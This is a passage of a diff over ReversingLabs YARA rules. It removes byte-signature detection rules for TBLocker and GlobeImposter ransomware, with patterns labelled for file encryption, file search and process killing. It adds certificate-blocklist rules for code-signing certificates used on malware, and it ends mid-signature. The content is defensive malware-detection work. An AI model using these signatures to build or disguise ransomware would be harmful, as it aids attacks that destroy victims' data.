+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Sivi Technology Limited" and pe.signatures [ i ] . serial == "21:22:06:46:c6:39:d6:2c:16:99:2f:46" and 1466130984 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Tblocker : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_738663F2C9E4Adb3Ad5306Aa5E7Cc548 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects TBLocker ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "91793018-baf6-5e70-83b6-8793482c3bec"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "9fa41321-9736-5e67-b561-005b6d893e3f"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.TBLocker.yara#L1-L85"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16618-L16634"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "81f0077655ac0e59cd8dc05be602ae500c938668bd57d3cf4a51fbff2a5b6b83"
+		logic_hash = "518a22e31432ee42e6aceb861815f7f9e84f2430b7fb3a78b498e45c584584ab"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "TBLocker"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$main_ransomware_function_p1 = {
-            00 02 16 28 ?? ?? ?? ?? 00 02 17 28 ?? ?? ?? ?? 00 02 16 28 ?? ?? ?? ?? 00 02 16 28 ?? ?? ?? ?? 00 02
-            16 28 ?? ?? ?? ?? 00 02 28 ?? ?? ?? ?? 00 00 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 16 FE ?? 0A 06 2C ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 72 ?? ?? ?? ??
-            28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 18 16 15 28 ?? ?? ?? ?? 26 00 00 28 ?? ?? ?? ?? 28 ?? ??
-            ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 16 FE ?? 0B 07 39 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72
-            ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE ?? 0C 08 2C ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ??
-            ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 28 ?? ?? ?? ?? 00 00 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 6F ??
-            ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 00 DE ?? 25
-            28 ?? ?? ?? ?? 0D 00 28 ?? ?? ?? ?? DE ?? 00 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 17 28 ?? ?? ?? ??
-            00 02 18 28 ?? ?? ?? ?? 00 02 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ??
-            6C 23 ?? ?? ?? ?? ?? ?? ?? ?? 5B 02 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6C 23 ?? ?? ?? ?? ?? ?? ?? ?? 5B 59
-        }
-		$main_ransomware_function_p2 = {
-            28 ?? ?? ?? ?? B7 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6C 23 ?? ?? ?? ?? ?? ?? ??
-            ?? 5B 28 ?? ?? ?? ?? B7 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ??
-            ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6C 23 ?? ?? ?? ?? ?? ?? ?? ?? 5B 02 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6C 23
-            ?? ?? ?? ?? ?? ?? ?? ?? 5B 59 28 ?? ?? ?? ?? B7 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ??
-            ?? 6C 23 ?? ?? ?? ?? ?? ?? ?? ?? 5B 23 ?? ?? ?? ?? ?? ?? ?? ?? 5A 28 ?? ?? ?? ?? B7 73 ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 00 02 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6C 23 ?? ??
-            ?? ?? ?? ?? ?? ?? 5B 02 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6C 23 ?? ?? ?? ?? ?? ?? ?? ?? 5B 59 28 ?? ?? ??
-            ?? B7 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 1F ?? DA 73 ?? ?? ?? ?? 6F ?? ?? ?? ??
-            00 02 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6C 23 ?? ?? ?? ?? ?? ??
-            ?? ?? 5B 02 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6C 23 ?? ?? ?? ?? ?? ?? ?? ?? 5B 59 28 ?? ?? ?? ?? B7 28 ??
-            ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6C 23 ?? ?? ?? ?? ?? ?? ?? ?? 5B 23 ?? ?? ?? ?? ??
-            ?? ?? ?? 5A 28 ?? ?? ?? ?? B7 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F
-        }
-		$search_files = {
-            00 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 03 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 38 ?? ?? ?? ?? 06 6F ?? ?? ??
-            ?? 0B 07 07 6F ?? ?? ?? ?? 17 DA 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 16 FE
-            ?? 0C 08 2C ?? 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE ?? 0D 09 2C ?? 00 02 07 07 72 ??
-            ?? ?? ?? 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 07 28 ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ??
-            ?? 13 ?? 00 11 ?? 6F ?? ?? ?? ?? 16 14 28 ?? ?? ?? ?? 26 28 ?? ?? ?? ?? DE ?? 00 00 00 00 00 00 06 6F
-            ?? ?? ?? ?? 13 ?? 11 ?? 3A ?? ?? ?? ?? DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? 00 DC DE ?? 25 28 ?? ?? ?? ??
-            13 ?? 00 28 ?? ?? ?? ?? DE ?? 00 03 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 13 ??
-            00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 11 ?? 6F ??
-            ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 17 DA 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ??
-            ?? ?? ?? 16 FE ?? 13 ?? 11 ?? 2C ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE ?? 13 ??
-            11 ?? 2C ?? 00 02 11 ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 11 ??
-            28 ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 11 ?? 6F ?? ?? ?? ?? 16 14 28 ?? ?? ?? ?? 26 28 ??
-            ?? ?? ?? DE ?? 00 00 00 00 00 00 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 3A ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11
-            ?? 6F ?? ?? ?? ?? 00 DC DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE ?? 00 00 11 ?? 17 D6 13 ??
-            11 ?? 11 ?? 8E 69 FE ?? 13 ?? 11 ?? 3A ?? ?? ?? ?? 2A
-        }
-		$encrypt_files = {
-            00 00 03 19 17 73 ?? ?? ?? ?? 0A 04 18 18 73 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0C 08 28 ?? ?? ?? ?? 05 6F
-            ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 08 28 ?? ?? ?? ?? 05 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 08 6F ?? ?? ?? ??
-            0D 07 09 17 73 ?? ?? ?? ?? 13 ?? 06 6F ?? ?? ?? ?? 17 6A DA B7 17 D6 8D ?? ?? ?? ?? 13 ?? 06 11 ?? 16
-            11 ?? 8E 69 6F ?? ?? ?? ?? 26 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 00 07
-            6F ?? ?? ?? ?? 00 06 6F ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE ?? 00 2A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( all of ( $main_ransomware_function_p* ) ) and $search_files and $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GIN-Konsalt" and pe.signatures [ i ] . serial == "73:86:63:f2:c9:e4:ad:b3:ad:53:06:aa:5e:7c:c5:48" and 1498435200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Globeimposter : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_4280F2C8Ce1D98E5F8Da7Ecb005Eeae5 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects GlobeImposter ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "6634a554-b4bb-503d-a4f1-9997b4caa1f0"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "559dc522-bc23-5716-b8ad-9e9df102936b"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.GlobeImposter.yara#L1-L171"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16636-L16652"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "4345a767f270428f3b509fdad5a96bf9b494b190d3a836c4bf53dfd75da5bacb"
+		logic_hash = "4cc8f00a9704f595f3e48375942a19cd6f8d6c0e53afc932a61f5a4326be4bcb"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "GlobeImposter"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_1 = {
-            81 EC ?? ?? ?? ?? 83 24 24 ?? 6A ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 44 24
-            ?? 50 E8 ?? ?? ?? ?? 8D 04 24 50 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 53 8B 1D ??
-            ?? ?? ?? 55 56 57 8B 3D ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 8D 44 24 ?? 50 E8 ?? ??
-            ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0 8D 84 24 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 50 89 74 24 ?? FF D3 8D 44 24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
-            8B E8 83 FD ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D7 85 C0 0F 84 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 33 C0 66 89 84
-            74 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF D3 6A ?? 8D 44 24 ?? 50 E8
-            ?? ?? ?? ?? F6 44 24 ?? ?? 8B F0 74 ?? 6A ?? 56 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D3 8D 84 24 ?? ?? ?? ?? 50 8D 44 24 ??
-            50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 8D 44 24 ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ??
-            50 FF D7 85 C0 0F 84 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 8D 44 24 ??
-            50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? A8 ?? 74 ?? 83 E0 ?? 50 8D 84 24 ?? ??
-            ?? ?? 50 FF 15 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 50 FF B4 24
-            ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 85 C0 75 ?? 8D 84 24 ?? ?? ?? ??
-            50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ??
-            50 FF D3 6A ?? 8D 84 24 ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D
-            84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B 74 24 ?? 59 8D 44 24 ?? 50
-            55 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 55 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 E8
-            ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 5F 5E 5D 5B 81 C4 ?? ?? ?? ?? C2
-        }
-		$search_files_1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
-            ?? 8B F8 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D8 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 F6
-            8D 85 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 DB 74 ?? F6 C3 ?? 74 ?? 8D 85 ??
-            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 83 F8 ?? 74 ?? 83 F8 ?? 75 ?? 6A ?? 6A
-            ?? C6 85 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89
-            04 B7 51 50 FF 15 ?? ?? ?? ?? 46 FE 85 ?? ?? ?? ?? D1 EB 75 ?? EB ?? 68 ?? ?? ?? ??
-            FF 34 B7 FF 15 ?? ?? ?? ?? 85 C0 74
-        }
-		$encrypt_files_2 = {
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 24 24 ?? 53 55 56 57 E8 ?? ?? ?? ?? 8B D0 8D 4C 24
-            ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 1D ?? ?? ??
-            ?? 8B 35 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 84 24 ?? ??
-            ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 89 7C 24 ??
-            FF D3 8D 44 24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B E8 83 FD ?? 0F 84
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 33 C0 66 89 84 7C ?? ?? ?? ?? 8D 44
-            24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF D3 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B F8 33 D2 F6 44
-            24 ?? ?? 8B CF 74 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24
-            ?? ?? ?? ?? 50 FF D3 8D 94 24 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ??
-            42 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0
-            0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? FF 15 ?? ?? ?? ?? 50 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24
-            ?? A8 ?? 74 ?? 83 E0 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 51 6A ?? 5A 8B
-            CF E8 ?? ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8D 84 24 ?? ??
-            ?? ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 84 24 ?? ??
-            ?? ?? 50 FF D3 6A ?? 8D 84 24 ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
-            ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 8B 7C 24 ?? 59 8D 44 24 ??
-            50 55 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 55 FF 15 ?? ?? ?? ?? 8D 4C 24 ?? E8
-            ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 5F 5E 5D 5B 81 C4 ?? ?? ?? ?? C2
-        }
-		$kill_specific_processes_2 = {
-            81 EC ?? ?? ?? ?? 56 57 6A ?? 5E 56 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89
-            74 24 ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 0F 84 ?? ?? ?? ?? 8D 84 24 ??
-            ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 53 55 BE ?? ?? ??
-            ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
-            ?? 8B E8 33 D2 85 ED 7E ?? 0F BE 0C 1A E8 ?? ?? ?? ?? 88 04 1A 42 3B D5 7C ?? FF 36
-            53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 83 C6 ?? 81 FE ?? ?? ?? ?? 7C ?? 85 C0 74 ?? 33 DB
-            53 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 50 FF 15 ?? ?? ?? ?? FF B4
-            24 ?? ?? ?? ?? 8B F0 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 68 ??
-            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 56 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 8D
-            44 24 ?? 50 53 53 68 ?? ?? ?? ?? 53 53 53 8D 84 24 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ??
-            ?? 8D 84 24 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF 15 ??
-            ?? ?? ?? 5D 5B 5F 5E 81 C4 ?? ?? ?? ?? C2
-        }
-		$kill_specific_processes_1 = {
-            81 EC ?? ?? ?? ?? 55 56 57 6A ?? 5E 56 33 ED 8D 44 24 ?? 55 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 89 74 24 ?? 55 6A ?? E8 ?? ?? ?? ?? 8B F8 89 7C 24 ?? 83 FF ?? 0F 84 ?? ?? ?? ??
-            53 8D 84 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 8B 5C
-            24 ?? 83 BC 24 ?? ?? ?? ?? ?? 8B F5 7E ?? 55 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ??
-            8B E8 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 33 DB 89 44 24 ?? 85 C0 7E ?? 8B F8
-            0F BE 0C 2B 51 E8 ?? ?? ?? ?? 88 04 2B 43 3B DF 7C ?? 8B 84 24 ?? ?? ?? ?? FF 34 B0
-            55 FF 15 ?? ?? ?? ?? 8B D8 85 DB 75 ?? 46 50 5D 3B B4 24 ?? ?? ?? ?? 7C ?? 8B 7C 24
-            ?? 33 ED 85 DB 74 ?? 55 68 ?? ?? ?? ?? 55 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 55 50 FF
-            15 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? 8B F0 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 C4
-            ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 56 8D 44 24 ?? 50 FF 15 ?? ?? ??
-            ?? 8D 44 24 ?? 50 8D 44 24 ?? 50 55 55 68 ?? ?? ?? ?? 55 55 55 8D 84 24 ?? ?? ?? ??
-            50 55 FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ??
-            ?? ?? 57 FF 15 ?? ?? ?? ?? 5B 5F 5E 5D 81 C4 ?? ?? ?? ?? C2
-        }
-		$encrypt_files_3 = {
-            68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 33 C0 66 89 84 74 ?? ??
-            ?? ?? 8D 44 24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF D3 6A ?? 8D 44 24 ?? 50 E8 ?? ?? ??
-            ?? F6 44 24 ?? ?? 8B F0 74 ?? 6A ?? 56 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D3 8D 84 24 ?? ?? ?? ?? 50 8D 44 24 ?? 50 E8 ??
-            ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 8D 44 24 ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 44 24 ?? 50 FF
-            D7 85 C0 0F 84 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 8D 44 24 ?? 50 FF
-            D7 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? A8 ?? 74 ?? 83 E0 ?? 50 8D 84 24 ?? ?? ?? ??
-            50 FF 15 ?? ?? ?? ?? FF 74 24 ?? 6A ?? 56 E8 ?? ?? ?? ?? 50 FF 74 24 ?? 8D 84 24 ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? 85 C0 75 ?? 8D 84 24 ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ??
-            50 FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D3 6A ?? 8D 84 24
-            ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 E8
-            ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B 74 24 ?? 59 8D 44 24 ?? 50 55 FF 15
-        }
-		$search_files_2 = {
-            53 55 56 57 8B 3D ?? ?? ?? ?? 6A ?? 6A ?? FF D7 50 FF 15 ?? ?? ?? ?? 8B E8 FF 15 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 8B D8 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 33 F6 8D 84 24 ?? ??
-            ?? ?? 56 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 DB 74 ?? F6 C3 ?? 74 ?? 8D 84 24 ?? ?? ?? ??
-            50 FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 83 F8 ?? 74 ?? 83 F8 ?? 75 ?? 6A ?? 6A ?? C6 84
-            24 ?? ?? ?? ?? ?? FF D7 50 FF 15 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 89 44 B5 ?? 51 50
-            FF 15 ?? ?? ?? ?? 46 FE 84 24 ?? ?? ?? ?? D1 EB 75 ?? 33 FF 85 F6 7E ?? 8B 9C 24 ??
-            ?? ?? ?? 8D 44 24 ?? 2B E8 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 8C
-            24 ?? ?? ?? ?? 89 48 ?? 8D 0C BD ?? ?? ?? ?? 03 CD 89 58 ?? 8B 4C 0C ?? 89 08 33 C9
-            51 51 50 68 ?? ?? ?? ?? 51 51 FF 15 ?? ?? ?? ?? 89 44 BC ?? 47 3B FE 7C ?? 6A ?? 6A
-            ?? 8D 44 24 ?? 50 56 FF 15
-        }
-		$kill_specific_processes_3 = {
-            E8 ?? ?? ?? ?? 83 C4 ?? 89 74 24 ?? 55 6A ?? E8 ?? ?? ?? ?? 8B F8 89 7C 24 ?? 83 FF
-            ?? 0F 84 ?? ?? ?? ?? 53 8D 84 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 50 57
-            E8 ?? ?? ?? ?? 8B 5C 24 ?? 83 BC 24 ?? ?? ?? ?? ?? 8B F5 7E ?? 55 8D 84 24 ?? ?? ??
-            ?? 50 E8 ?? ?? ?? ?? 8B E8 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 33 DB 89 44 24
-            ?? 85 C0 7E ?? 8B F8 0F BE 0C 2B 51 E8 ?? ?? ?? ?? 88 04 2B 43 3B DF 7C ?? 8B 84 24
-            ?? ?? ?? ?? FF 34 B0 55 FF 15 ?? ?? ?? ?? 8B D8 85 DB 75 ?? 46 50 5D 3B B4 24 ?? ??
-            ?? ?? 7C ?? 8B 7C 24 ?? 33 ED 85 DB 74 ?? 55 68 ?? ?? ?? ?? 55 FF 15 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 55 50 FF 15 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? 8B F0 68 ?? ?? ?? ?? 56 FF
-            15 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 56 8D 44 24
-            ?? 50 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 44 24 ?? 50 55 55 68 ?? ?? ?? ?? 55 55 55
